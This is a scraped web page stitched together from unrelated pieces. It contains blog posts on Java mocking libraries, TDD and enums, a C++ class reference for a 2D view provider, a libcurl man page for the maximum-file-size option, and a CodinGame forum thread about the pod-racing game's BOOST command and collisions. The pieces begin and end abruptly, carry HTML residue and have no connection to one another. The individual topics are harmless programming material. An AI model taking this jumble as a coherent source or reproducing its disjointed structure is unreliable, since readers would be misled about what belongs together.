We are might be increasing the actual complexity of the condition but our code is now expressive: if in 3 months time we pick up this code again we clearly know what business rule we’re applying without looking at <<em>any<</em> additional resource.</p> <p>The code now is <strong>communicating our intention</strong>.</p> <img src="" height="1" width="1" alt=""/> EasyMock experience 2008-02-23T00:00:00+00:00 <p>For the last two weeks I’ve worked with <a href="">EasyMock</a> and coming from a JMock background it’s easy to make a comparison between the two libraries.</p> <p>I have to say that I’m less than impressed by EasyMock: the whole concept of the two different states (recording and active) for the mock library looks unreasonable.</p> <p>Let’s look on how we can create a mock with EasyMock:</p> <p><code> MyInterface mock =EasyMock.mock(MyInterface.class); //expectation mock.myMethod(); //activation step mock.replay(); //actual call to the mock mock.myMethod(); //verification that the method has been called mock.verify(); </code></p> <p>There’s also a more DSLish style of defining expectations, that I personally prefer (it differentiates clearly the definition of the expectation from the actual method call).</p> <p><code> EasyMock.expects(mock.myMethod());</code></p> <p>This style is the only one available when the expectation is more complex:</p> <p><code> EasyMock.expects(mock.myMethod()).andReturn(true);</code></p> <p>But what if I want to define that a certain method will be called on the stub, no matter how many times ?</p> <p>I can either use a different way of creating the mock: <code> EasyMock.createNiceMock(MyInterface.class); </code></p> <p>or using the DSL way:</p> <p><code>EasyMock.expects(mock.myMethod()).anyTimes() </code></p> <p>I think that having two ways of defining the same expectation is pretty confusing, specially when you’re using the API for the first time. 
What I’m looking for in a mock library is the capability of defining the expectations in a coincise but expressive way and then inject the dependency in the object I want to test.</p> <p><a href="" title="JMock">JMock2</a> is pretty close, but I have to admit the the inner class notation with all those curly brackets around is not helping.</p> <p>A fellow <a href="">ThoughtWorker</a> have just released <a href="" title="Mockito" target="_blank">Mockito</a>: it looks like it’s taking the best from EasyMock and JMock and put in a single library. Might be worth a try.</p> <img src="" height="1" width="1" alt=""/> The last "D" in TDD means more than just "Development" 2007-12-05T00:00:00+00:00 <a href="" target="_blank">Here</a> some interesting thoughts on TDD. <img src="" height="1" width="1" alt=""/> Java enum as a strategy pattern 2007-10-27T00:00:00+00:00 <p>I’ve always thought that Java enums can represent a simple but powerful strategy pattern baked into Java.</p> <p>This idea has been reinforced by <a href="">this article</a> by Ralph Johnson of GoF fame, where while talking about design patterns and language design he says:</p> <p><cite> Design patterns are not made of stone. […] Over time, we should change our programming languages so that they build in things that used to be patterns. </cite></p> <p>This evolution of modern languages will (hopefully) increase the number of people that are really able to write Object Oriented code, modelling behaviours and not only using objects as a dull namespace construct.</p> <img src="" height="1" width="1" alt=""/> Useless comment 2007-04-25T00:00:00+00:00 <script src=""></script> Can a name attribute in an Entity class represent something different than the name of the entity? <img src="" height="1" width="1" alt=""/> | https://feeds.feedburner.com/lucagrulla | CC-MAIN-2018-51 | en | refinedweb |
Standard 2D-View provider. More...
#include <CViewProviderGuiComp.h>
Standard 2D-View provider.
It allows the display calibration to be set and supports i2d::ICalibrationProvider for retrieving it.
Definition at line 22 of file CViewProviderGuiComp.h.
Definition at line 29 of file CViewProviderGuiComp.h.
Definition at line 30 of file CViewProviderGuiComp.h.
Background type for the 2D-view.
Definition at line 35 of file CViewProviderGuiComp.h.
Get the list of menu commands.
These commands will be integrated into the global menu system, independently of the currently selected view. To support a normal pull-down menu, the depth of this tree structure should be at least 3.
Reimplemented from ibase::ICommandsProvider.
Called when items should be removed from the specified view.
Implements iqt2d::IViewProvider.
Get the ID identifying this view.
Typically this ID is 0 for the first view, 1 for the second, etc.
Implements iqt2d::IViewProvider.
Reimplemented from iqtgui::CGuiComponentBase.
Reimplemented from icomp::CComponentBase.
Implements imod::CMultiModelDispatcherBase.
© 2007-2017 Witold Gantzke and Kirill Lepskiy | http://ilena.org/TechnicalDocs/Acf/classiqt2d_1_1_c_view_provider_gui_comp.html | CC-MAIN-2018-51 | en | refinedweb |
CURLOPT_MAXFILESIZE_LARGE explained
NAME
CURLOPT_MAXFILESIZE_LARGE - maximum file size allowed to download
SYNOPSIS
#include <curl/curl.h>

CURLcode curl_easy_setopt(CURL *handle, CURLOPT_MAXFILESIZE_LARGE, curl_off_t size);
DESCRIPTION
Pass a curl_off_t as parameter. This allows you to specify the maximum size (in bytes) of a file to download. If the file requested is found larger than this value, the transfer will not start and CURLE_FILESIZE_EXCEEDED is returned. Note that the file size is not always known prior to download; for such transfers this option has no effect even if the file ends up being larger than the given limit.
DEFAULT
PROTOCOLS
EXAMPLE
CURL *curl = curl_easy_init();
if(curl) {
  CURLcode ret;
  /* cast before shifting: a plain int 1 << 48 would overflow */
  curl_off_t ridiculous = (curl_off_t)1 << 48;
  curl_easy_setopt(curl, CURLOPT_URL, "");
  /* refuse to download if larger than ridiculous */
  curl_easy_setopt(curl, CURLOPT_MAXFILESIZE_LARGE, ridiculous);
  ret = curl_easy_perform(curl);
  curl_easy_cleanup(curl);
}
AVAILABILITY
RETURN VALUE
Returns CURLE_OK if the option is supported, and CURLE_UNKNOWN_OPTION if not.
SEE ALSO
CURLOPT_MAXFILESIZE, CURLOPT_MAX_RECV_SPEED_LARGE
Laravel Enum Package
Laravel Enum is a package by Ben Sampson that adds support for creating enums in PHP and includes a generator for Laravel. Here’s an example of what an Enum class looks like using this package:
<?php namespace App\Enums; use BenSampo\Enum\Enum; final class UserType extends Enum { const Administrator = 0; const Moderator = 1; const Subscriber = 2; const SuperAdministrator = 3; }
Check out the readme for a list of methods and other examples of how to use this package.
One of my favorite features I noticed from the readme is controller validation using a supplied
EnumValue rule:
<?php public function store(Request $request) { $this->validate($request, [ 'user_type' => ['required', new EnumValue(UserType::class)], ]); }
You can also validate on the keys using the
EnumKey rule:
<?php public function store(Request $request) { $this->validate($request, [ 'user_type' => ['required', new EnumKey(UserType::class)], ]); }
Another Laravel-specific feature that you might find useful is localization:
<?php // resources/lang/en/enums.php use App\Enums\UserType; return [ 'user-type' => [ UserType::Administrator => 'Administrator', UserType::SuperAdministrator => 'Super administrator', ], ]; // resources/lang/es/enums.php use App\Enums\UserType; return [ 'user-type' => [ UserType::Administrator => 'Administrador', UserType::SuperAdministrator => 'Súper administrador', ], ];
Learn More
Ben Sampson wrote a post Using enums in Laravel which is an excellent follow-up resource to the inspiration and thought process behind his package.
You can view the Laravel Enum source code and get installation instructions from the BenSampo/laravel-enum GitHub repository. | https://laravel-news.com/laravel-enum-package | CC-MAIN-2019-13 | en | refinedweb |
Introduction
XML is widely used in software systems for persistent data, exchanging data between a web service and client, and in configuration files. A misconfigured XML parser can leave a critical flaw in an application. Processing of untrusted XML streams can result in a range of exploits, including remote code execution and sensitive data being read. This tutorial will explain to information security specialists and programmers the fundamentals of XML and XML external entity (XXE) injection and it will go through the major XXE issues found on Google and Facebook servers. Moreover, this tutorial provides a hands-on lab for identifying and exploiting XXE vulnerabilities, along with practical guidance on how to secure a code-supporting XML input parsing.
Case
An XML to JSON converter tool
Outline
- What is XML?
- What is an XML external entity (XXE)?
- What could be more fun than exploiting this vulnerability to access Google and Facebook servers?
- How to set up your vulnerable environment
- How to identify/detect XXE vulnerability?
- How to exploit the XEE injection for fun and profit
- How to mitigate security risks of XML external entity processing
What Is XML?
XML, which stands for Extensible Markup Language, is a markup language designed to store data. It is widely adopted by software systems, used to store configuration files, and in web services it assists in exchanging data between a consumer and a service provider.
What Is XML External Entity (XXE)?
XXE: XML external entities allow data to be included dynamically from a given resource (local or remote) at parse time. This feature can be exploited by attackers to include malicious data from external URIs or confidential data residing on the local system. If XML parsers are not configured to prevent or limit external entities, they are forced to access the resources specified by the URI.
<?xml version="1.0"?>
<!DOCTYPE myFile [
  <!ELEMENT myFile ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<myFile>&xxe;</myFile>
This is a well-formed XML document. During parsing, the parser will replace the external entity &xxe; with the content of the system file /etc/passwd, which contains confidential information that might be disclosed. As another example: if the SYSTEM identifier instead points to a malicious server that never responds, the parser might end up waiting, causing delays in the subsequent processes.
Successful exploitation of this vulnerability may result in disclosure of sensitive data, denial of service, or an attacker gaining unauthorized access to the system resources. If an XML parser does not block external entity expansion and is able to access the referred content, one user may be able to gain unauthorized access to the data of other users, leading to a breach of confidentiality.
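The entity-expansion mechanism that XXE abuses can be observed with nothing but Python's standard library. The sketch below uses a harmless *internal* entity (the stdlib parsers do not fetch external entities, which is exactly the hardening discussed later in this article); a real XXE payload simply swaps the inline value for a SYSTEM identifier pointing at a local file or remote URL.

```python
# Demonstrates DTD entity expansion -- the mechanism XXE abuses -- using only
# the standard library. The entity here is internal (inline text); an XXE
# payload would declare it as SYSTEM "file:///etc/passwd" or a remote URL.
import xml.etree.ElementTree as ET

doc = """<?xml version="1.0"?>
<!DOCTYPE myFile [
  <!ENTITY greeting "expanded-by-the-parser">
]>
<myFile>&greeting;</myFile>"""

# The parser substitutes &greeting; with the entity's replacement text.
root = ET.fromstring(doc)
print(root.text)  # -> expanded-by-the-parser
```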
Below, I have detailed the characteristics of XXE according to the OWASP Top 10 (2017). Exploitability: attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document. Detectability: this vulnerability is not commonly tested for, as of 2017.
Impacts: These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and execute other attacks. The business impact depends on the protection needs of the affected application and data.
What could be more fun than exploiting this vulnerability to access Google and Facebook servers?
Security researchers were able to exploit an XXE vulnerability in the Google Toolbar button gallery product. This product allows users to customize their toolbar buttons: programmers can style a button by editing and uploading an XML file. It turned out that the XML parser interpreted the DTD blindly. The researchers managed to craft a malicious XML file and upload it to the Google production server, letting them read sensitive files. Google awarded a bug bounty of $10,000 for this finding.

A security expert managed to attack Facebook servers with an MS Word document, achieving remote code execution. The bug specifically affected OpenID. Facebook awarded a bounty of $6,000 for alerting them to this bug.
How do we identify/detect an XXE vulnerability?
To answer this question, you may set up an experimentation lab. We take a real-world scenario: an XML-to-JSON converter similar to the many converter tools available online.
The following installation and configuration was tested on a Debian 9 machine.
The tool is written on top of the Flask framework and uses simplejson. First, install the dependencies:
$ pip install flask $ pip install simplejson
Next, run the application:
$ python index.py
At this point, the application is up and running and you can start your experiment.
First of all, verify that the application accepts XML as input (directly or via file upload).
Source code analysis tools can help detect XXE in source code, although manual code review is the best alternative when the source code is provided. Dynamic analysis testing tools require additional manual steps to detect and exploit this vulnerability.
The second step is to check whether document type definition (DTD) processing is enabled in the parser.
To do this, change the phone value to &xxe; and click convert. You should get an error message:
Entity 'xxe' not defined, line 5, column 14 (line 5)
This means that the application tried to process XML external entities and therefore it is vulnerable.
Attack Scenario
Once you have discovered the vulnerability, you can forge and provide malicious XML input.
The first attack scenario is to attempt to extract data from the server.
Let's read /etc/passwd from the server by prepending a definition of the xxe entity:
<!DOCTYPE infosecinstitute [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<card>
  <name>Toto</name>
  <title>Researcher</title>
  <phone>&xxe;</phone>
</card>
Now you should see the content of the /etc/passwd file; you have read a secret file from the server.
An additional attack scenario is to probe the server's private network or attempt a denial-of-service attack.
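Payloads for both scenarios follow the same template, varying only the SYSTEM identifier: a file:// URI for data extraction, or an http:// URI aimed at an internal host for probing the private network. A small, hypothetical helper makes that explicit:

```python
# Payload generator (hypothetical helper, for lab use only). The same
# DOCTYPE template covers local file reads and SSRF-style internal probes;
# only the SYSTEM identifier changes.
def xxe_payload(uri, root="card"):
    """Build an XXE payload whose entity resolves to the given URI."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root} [\n"
        f'  <!ENTITY xxe SYSTEM "{uri}">\n'
        "]>\n"
        f"<{root}><phone>&xxe;</phone></{root}>\n"
    )

print(xxe_payload("file:///etc/passwd"))        # data extraction
print(xxe_payload("http://10.0.0.5:8080/status"))  # internal network probe (example address)
```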
Mitigate Security Risks of XML External Entity Processing
Because software systems that improperly use vulnerable parsers are themselves vulnerable, we recommend that developers of such systems pay special attention to preventing these attacks if they decide to adopt a third-party XML parser, even one provided by a high-profile vendor such as Oracle or Microsoft. In order to block XXE attacks, software developers should gain a full understanding of the XML parser they are considering adopting and avoid its insecure features (e.g., using a schema instead of a DTD). If external entity references are required, they should refer to trusted sources only. Known vulnerabilities of the parser and their fixes should be investigated, and input sanitization should be performed before parsing XML content. Adequate security testing of the parser should also be carried out.
Recommendations for Parser Developers: Developers of XML parsers need to be fully aware of all potential XML-based attacks and should be able to provide countermeasures wherever possible. It was observed during our experiment that some vulnerabilities can be exploited because of the features allowed in the default configurations of XML parsers. Parser developers should provide secure default configurations and provide alerts when any potentially insecure feature is enabled via making changes to the default configurations. Parser developers should perform security testing of their parsers. They should also provide better documentation, including the potential risks of enabling any feature. This would guide software developers to secure use of their parsers.
Implement positive (“whitelisting”) server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.
Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.
Back to the lab, to fix the bug, Python LXML parser can be supplied as an additional argument to various parse functions of the lxml API.
from lxml import etree parser = etree.XMLParser(resolve_entities=False) etree.fromstring(xml, parser=parser)
Conclusion
In this article, we studied the potential of a major type of XML-based attacks, specifically XML external entities (XXE) that may undermine today’s XML parsers and systems making use of those parsers. We proposed a hands-on lab to learn how to identify, detect, exploit, and mitigat XXE vulnerability based on vulnerable XML parsers. We showed the impact of this type of vulnerability on many known services, making such alarming vulnerability a warning for software developers to take appropriate security measures before using these vulnerable XML parsers in their software development projects. Parser developers need to fix the problems and/or provide better documentation to help developers configure such parsers to secure their usage.
References | https://resources.infosecinstitute.com/xml-vulnerabilities-still-attractive-targets-attackers/ | CC-MAIN-2019-13 | en | refinedweb |
Scala Supertypes to Typeclasses
After a few months of writing about Cats, it is great to take a small break. This pause isn’t to start anything new, but to build foundations for the upcoming posts. If you are looking to learn about those scary FP words, you will need to understand what is below.
Chances are, if you are looking to learn about cats, you will find the start quite easy. Hopefully, I can make the end easy too.
When you write code, it is a good idea to aim for generic logic. You never know when you might need to solve another very similar problem.
The simplest way to avoid duplication is by writing functions. They allow to execute many times the same logic. This logic should be based on input arguments, and return output ones.
def maxOption(elements: List[Int]): Option[Int] = {
if(elements.isEmpty) None
else Some(elements.max)
}
The above function is quite simple. It finds the largest element in a
List[Int], or returns
None. It is a safe alternative to the built in one.
Our
maxOption function is a great way to avoid redefining the if statement, but it isn’t very generic. It only works with
List[Int].
def maxOption(elements: Array[Float]): Option[Float] = ???
def maxOption(elements: Set[String]): Option[String] = ???
def maxOption(elements: Vector[Boolean]): Option[Boolean] = ???
...
It would be silly to define the function for every combination of types. This can be avoided with abstraction.
A supertype represent functionalities that are inherited by another type. This is often represented with animals, shapes, or vehicles.
class Bicycle(
cadence: Int,
gear: Int,
speed: Int,
)
class MountainBike(
cadence: Int,
gear: Int,
speed: Int,
seatHeight: Int,
) extends Bicycle(cadence, gear, speed)
Array,
List, and
Set have many supertypes in common. Picking the smallest common denominator would increase compatibility with other types.
The only need for
maxOption is for the supertype to implement
isEmpty, and
max. Those can be found in the
GenTraversableOnce trait.
import scala.collection.GenTraversableOnce
def maxOption(elements: GenTraversableOnce[Int]): Option[Int] = {
if(elements.isEmpty) None
else Some(elements.max)
}
GenTraversableOnce has over 350 subclasses. By using it instead of
List, we increased compatibility, but
Int is still very limiting.
Int, like
String,
Boolean, and many other types, only extend
Any, and
AnyVal. Those types can’t be compared to identify the maximum value.
def maxOption(elements: GenTraversableOnce[Any]): Option[Any] = ???
Instead of using a supertype,
Int should be implemented as a generic. This allows the caller to specify any type, but it also means the function must handle all types.
def maxOption[A](elements: GenTraversableOnce[A]): Option[A] = ???
Once again this seems like the wrong approach, until you attempt to compile the code.
scala> import scala.collection.GenTraversableOnce
import scala.collection.GenTraversableOnce
scala> def maxOption[A](elements: GenTraversableOnce[A]) = {
| if(elements.isEmpty) None
| else Some(elements.max)
| }
<console>:14: error: No implicit Ordering defined for A.
else Some(elements.max)
^
The compiler raises an error. It doesn’t know how to identify a maximum
A, but it could with an
implicit Ordering.
Ordering is a trait used to sort elements. It allows the compiler to identify the
max value.
The function can take
Ordering as an extra argument
def maxOption[A](elements: GenTraversableOnce[A])
(implicit ord: Ordering[A]): Option[A] = {
if(elements.isEmpty) None
else Some(elements.max)
}
Or a type bound
def maxOption[A: Ordering](elements: GenTraversableOnce[A]) = {
if(elements.isEmpty) None
else Some(elements.max)
}
The second is just syntactic sugar for the first.
Ordering is a typeclass. Similarly to the supertype, it defines, and sometimes implement functionality. There is more to it, but I will keep that for the next post.
Lets see how
Ordering could be used for
maxOption if it was written for an auction company. It would need to return the highest
Bid.
case class Bid(
owner: String,
amount: Float)
The wrong approach is to remove the generic, and replace it by
Bid. This would work, but the function wouldn’t be generic anymore.
Instead, a new implementation of
Ordering should be created.
implicit val bidOrdering = new Ordering[Bid] {
def compare(x: Bid, y: Bid): Int = x.amount.compare(y.amount)
}
As long as the implicit is in scope, the function can be invoked with any
GenTraversableOnce[Bid].
Supertypes offer a simple hierarchy explanation that makes it easy for people to use. Typeclasses, with the implicits, aren’t as welcoming, but offer the same functionality, and more.
Next time, with the basics out of the way, I will focus on the more part. | https://medium.com/@pvinchon/scala-generics-and-type-classes-3495bc059d1f | CC-MAIN-2019-13 | en | refinedweb |
2011-02-23 15:34:53 8 Comments
I have logging function as follows.
logging.basicConfig( filename = fileName, format = "%(levelname) -10s %(asctime)s %(message)s", level = logging.DEBUG ) def printinfo(string): if DEBUG: logging.info(string) def printerror(string): if DEBUG: logging.error(string) print string
I need to login the line number, stack information. For example:
1: def hello(): 2: goodbye() 3: 4: def goodbye(): 5: printinfo() ---> Line 5: goodbye()/hello()
How can I do this with Python?
SOLVED
def printinfo(string): if DEBUG: frame = inspect.currentframe() stack_trace = traceback.format_stack(frame) logging.debug(stack_trace[:-1]) if LOG: logging.info(string)
gives me this info which is exactly what I need.
DEBUG 2011-02-23 10:09:13,500 [ ' File "/abc.py", line 553, in <module>\n runUnitTest(COVERAGE, PROFILE)\n', ' File "/abc.py", line 411, in runUnitTest\n printinfo(string)\n']
Related Questions
Sponsored Content
30 Answered Questions
[SOLVED] How do I concatenate two lists in Python?
- 2009-11-12 07:04:09
- y2k
- 1757682 View
- 1942 Score
- 30 Answer
- Tags: python list concatenation
6 Answered Questions
[SOLVED] How do I get the number of elements in a list in Python?
34 Answered Questions
[SOLVED] How to read a file line-by-line into a list?
25 Answered Questions
[SOLVED] How can I safely create a nested directory in Python?
- 2008-11-07 18:56:45
- Parand
- 2193035 View
- 3437 Score
- 25 Answer
- Tags: python exception path directory operating-system
33 Answered Questions
[SOLVED] How to get the current time in Python
17 Answered Questions
[SOLVED] How can I make a time delay in Python?
26 Answered Questions
[SOLVED] How can I remove a trailing newline in Python?
10 Answered Questions
[SOLVED] Why is reading lines from stdin much slower in C++ than Python?
- 2012-02-21 02:17:50
- JJC
- 227903 View
- 1636 Score
- 10 Answer
- Tags: python c++ benchmarking iostream getline
2 Answered Questions
43 Answered Questions
[SOLVED] How can I represent an 'Enum' in Python?
- 2008-08-31 15:55:47
- sectrean
- 723160 View
- 1146 Score
- 43 Answer
- Tags: python python-3.x enums
@barny 2019-03-11 17:18:35
This is based on @mouad's answer but made more useful (IMO) by including at each level the filename (but not its full path) and line number of the call stack, and by leaving the stack in most-recently-called-from (i.e. NOT reversed) order because that's the way I want to read it :-)
Each entry has file:line:func() which is the same sequence as the normal stacktrace, but all on the same line so much more compact.
You may need to add an extra f_back if you have any intervening calls to produce the log text.
Produces output like this:
I only need this stacktrace in two key functions, so I add the output of callers into the text in the logger.debug() call, like htis:
@bsimmons 2014-10-31 19:33:39
Late answer, but oh well.
Another solution is that you can create your own formatter with a filter as specified in the docs here. This is a really great feature as you now no longer have to use a helper function (and have to put the helper function everywhere you want the stack trace). Instead, a custom formatted implements it directly into the logs themselves.
Note: In the above code I trim the last 5 stack frames. This is just for convenience and so that we don't show stack frames from the python logging package itself.(It also might have to be adjusted for different versions of the logging package)
@ncoghlan 2011-02-23 22:40:08
As of Python 3.2, this can be simplified to passing the
stack_info=Trueflag to the logging calls. However, you'll need to use one of the above answers for any earlier version.
@Will S 2015-07-24 09:43:17
The docs are kind of wordy with regards to this. I had missed that, thanks!
@mouad 2011-02-23 16:06:33
Here is an example that i hope it can help you:
Result:
@Duncan 2011-02-23 16:01:06
Current function name, module and line number you can do simply by changing your format string to include them.
Most people only want the stack when logging an exception, and the logging module does that automatically if you call
logging.exception(). If you really want stack information at other times then you will need to use the traceback module for extract the additional information you need.
@Scott Stafford 2015-11-25 18:28:06
All parameters are documented here: docs.python.org/2/library/logging.html#logrecord-attributes.
@Erik Aronesty 2016-02-26 20:07:52
hard part is getting the stack_trace[:-1]
@Duncan 2016-02-28 20:03:34
@ErikAronesty, yes and that was already sufficiently covered by other answers when I posted, so I didn't include it in mine.
@Dunes 2011-02-23 15:47:33
Use stack_trace[:-1] to avoid including method/printinfo in the stack trace.
@ShadowRanger 2016-03-04 20:43:13
Instead of doing
stack_trace[:-1](which means it needs to format one frame more than you use, then slice the result), couldn't you do:
frame = inspect.currentframe(1)so you get the stack without the top layer, so
format_stackdoesn't need to process it, and the return from
format_stackrequires no manipulation?
@yanjost 2011-02-23 15:50:24
Look at traceback module
@Daniel Roseman 2011-02-23 15:46:44
Use the traceback module. | https://tutel.me/c/programming/questions/5093075/how+can+i+log+current+line+and+stack+info+with+python | CC-MAIN-2019-13 | en | refinedweb |
I apologize in advance if this is the wrong forum to be posing this question. I'd post to IBM's "developerWorks" forum, but it's currently in read-only mode until April 15, 2013.
JBoss AS version: 7.1.1.Final
Filenet Content Engine (CE) version: 5.1 fix pack 002
Environment: Microsoft Windows using Active Directory
Server 1: JBoss Application - exposes JAVA web services which integrate with the Filenet CE web services
Server 2: Websphere Network Deployment - exposes Filenet CE web services
Issue: Company policy requires JBoss to run as a windows service using a Domain account. It also dictates that the domain account be used to connect to the Filenet CE Web Services. The authentication between the two services is handled using JAAS.
Currently, the Filenet username and password are stored in a properties file (in plain text). I understand it's possible to use JBoss Vault to mask the password but that goes against our standard. It works like this:
//Jace.jar
import com.filenet.api.util.UserContext;
import com.filenet.api.core.Connection;
import javax.security.auth.Subject;
import com.filenet.api.core.Factory;
import com.company.util.PropertyUtil;
.
.
.
String connectionString = "<connString here>";
Connection conn = Factory.Connection.getConnection(connectionString);
UserContext uc = UserContext.get();
Subject sub = UserContext.createSubject(conn, PropertyUtil.getProperty("filenet.username"), PropertyUtil.getProperty("filenet.password"), "FileNetP8WSI"); //where "FileNetP8WSI is the JAAS stanza
uc.pushSubject(sub);
From here, a good JAAS subject is retrieved and the Filenet CE web services can be contacted for CRUD operations in the object store (document repository).
However, I'd like it to work like this (or some other variation):
String jbossWindowsServiceUsername = <routine to fetch domain user account JBoss is currently running as>;
String jbossWindowsServicePassword = <routine to fetch domain user's password JBoss is currently running as>;
String connectionString = "<connString here>";
Connection conn = Factory.Connection.getConnection(connectionString);
UserContext uc = UserContext.get();
Subject sub = UserContext.createSubject(conn, jbossWindowsServiceUsername, jbossWindowsServicePassword, "FileNetP8WSI"); //where "FileNetP8WSI is the JAAS stanza
uc.pushSubject(sub);
Any help this group can provide would be wonderful. Thanks in advance.
Joe M. | https://developer.jboss.org/message/808083?tstart=0 | CC-MAIN-2019-13 | en | refinedweb |
1 /* crypto/asn1/a_dup.c */ #include "cryptlib.h" 61 #include <openssl/asn1.h> 62 63 #ifndef NO_OLD_ASN1 64 65 void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x) 66 { 67 unsigned char *b, *p; 68 const unsigned char *p2; 69 int i; 70 char *ret; 71 72 if (x == NULL) 73 return (NULL); 74 75 i = i2d(x, NULL); 76 b = OPENSSL_malloc(i + 10); 77 if (b == NULL) { 78 ASN1err(ASN1_F_ASN1_DUP, ERR_R_MALLOC_FAILURE); 79 return (NULL); 80 } 81 p = b; 82 i = i2d(x, &p); 83 p2 = b; 84 ret = d2i(NULL, &p2, i); 85 OPENSSL_free(b); 86 return (ret); 87 } 88 89 #endif 90 91 /* 92 * ASN1_ITEM version of dup: this follows the model above except we don't 93 * need to allocate the buffer. At some point this could be rewritten to 94 * directly dup the underlying structure instead of doing and encode and 95 * decode. 96 */ 97 98 void *ASN1_item_dup(const ASN1_ITEM *it, void *x) 99 { 100 unsigned char *b = NULL; 101 const unsigned char *p; 102 long i; 103 void *ret; 104 105 if (x == NULL) 106 return (NULL); 107 108 i = ASN1_item_i2d(x, &b, it); 109 if (b == NULL) { 110 ASN1err(ASN1_F_ASN1_ITEM_DUP, ERR_R_MALLOC_FAILURE); 111 return (NULL); 112 } 113 p = b; 114 ret = ASN1_item_d2i(NULL, &p, i, it); 115 OPENSSL_free(b); 116 return (ret); 117 } | https://fossies.org/linux/openssl/crypto/asn1/a_dup.c | CC-MAIN-2019-13 | en | refinedweb |
(For9 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT
This is a listing of all documented functions in the PDL distribution. Alphabetical Listing of PDL Functions EOD $onldc = $PDL::onlinedoc; # new PDL::Doc ('/tmp/pdlhash.dbtxt'); $db = $onldc->ensuredb; while (my ($key,$val) = each %$db) { my $strip =...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
!!!!!!!!!!!!!!!!!!!!!!!!!!WARNING!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! As of PDL-2.006_04, the direction of the FFT/IFFT has been reversed to match the usage in the FFTW library and the convention in use generally. !!!!!!!!!!!!!!!!!!!!!!!!!!WARNING!!!...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This is version 1.008 of the PDL FAQ, a collection of frequently asked questions about PDL - the Perl Data Language....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module provides the functions used by PDL to overload the basic mathematical operators ("+ - / *" etc.) and functions ("sin sqrt" etc.) It also includes the function "log10", which should be a perl function so that we can overload it! Matrix mul...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
PDL has been compiled with WITH_BADVAL set to 1. Therefore, you can enter the wonderful world of bad value support in PDL. This module is loaded when you do "use PDL", "Use PDL::Lite" or "PDL::LiteF". Implementation details are given in PDL::BadValue...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
A simple cookbook how to create piddles manually. It covers both the Perl and the C/XS level. Additionally, it describes the PDL core routines that can be accessed from other modules. These routines basically define the PDL API. If you need to access...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
An implementation of online docs for PDL....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
These packages implements a couple of functions that should come in handy when debugging your PDL scripts. They make a lot of sense while you're doing rapid prototyping of new PDL code, let's say inside the perldl or pdl2 shell....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module explains how to get help with a PDL problem and how, when, and where to submit a bug report. In the future it may be extended to provide some sort of automated bug reporting capability....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT9 - 05 May 2018 21:04:58 GMT
Loads the smallest possible set of modules for PDL to work, importing only those functions always defined by PDL::Core) into the current namespace ("pdl", "piddle", "barf" and "null"). This is the absolute minimum set for PDL. Access to other functio...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This subclass of PDL allows one to manipulate PDLs of 'byte' type as if they were made of fixed length strings, not just numbers. This type of behavior is useful when you want to work with charactar grids. The indexing is done on a string level and n...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This page documents useful idioms, helpful hints and tips for using Perl Data Language v2.0. Help Use "help help" within *perldl* or *pdl2* or use the "pdldoc" program from the command line for access to the PerlDL documentation. HTML versions of the...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
Methods and functions for type conversions, PDL creation, type conversion, threading etc....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This module aims to contain useful functions. Honest....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
A meta document listing the documented PDL modules and the PDL manual documents...CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT
This file is an attempt to list the major user-visible changes between PDL versions 1.0 and 2.0....CHM/PDL-2.019 - 05 May 2018 21:04:58 GMT | https://metacpan.org/search?q=dist%3APDL | CC-MAIN-2018-30 | en | refinedweb |
activating SHIELD after BOOST is not able to affect BOOST
your X,Y values are not able neither to be the same like your opponent nor to even be in 400 units from him - u both have radius of 400, so your radiuses are summed up
Can someone help me How can I calculate the nextCheckpointAngle in Gold league?
Look up a trig function called ATan2. Depending on the language you're using, it might be included in the standard math package. It will give the angle between a point and the origin. If you subtract your position from the checkpoint's position (or maybe vice-versa, I get mixed up) and use ATan2 on that, it'll be the angle from you to the checkpoint instead.
Sorry guys for the question but i can't use BOOST too...
In C# I wrote :Console.WriteLine(nextCheckpointX + " " + nextCheckpointY + " " + BOOST);I simply replaced the Thurst value by the keyword BOOST, but it always says me that BOOST doesn't exists in the current context... Why if it's a keyword ?
Console.WriteLine(nextCheckpointX + " " + nextCheckpointY + " BOOST");
Thank you, i didn't understood to put it as a string
Hello,
After I have submitted twice my code. It is impossible to join the Bot Programming "Coders strike back".The error message is:"An error occurred (#-1): "internal error". Please contact coders@codingame.com".
Can you help ?
try to refresh?
Some bugs have been fixed in Gold/Legend (inputs, ranking)
Thank you that's great, what has been fixed besides the angle bug?
Hello, I'm now stuck on the 3rd level with a task "Pods will now collide with each other. Pods will forcibly bounce off each other when they come into contact. Additionally, extra maps are now available for racing."
I do not know, how to change program so that it will work. Can you please help me?
Game-wise, you now have to figure out how to calculate collisions and either avoid them, or use them to your advantage.
If your code is crashing, we'll need to see your errors to help.
how do i use the boost keyword
This question has been asked and answered a dozen times in this thread.
Actually, there was a misunderstanding. Nothing has changed on the ranking. Sorry for the wrong announcement and late fix.We could have been more proactive on this one. Don't hesitate to chase us here or me on chat for this kind of issue.
We could have been more proactive on this one. Don't hesitate to chase us here or me on chat for this kind of issue.
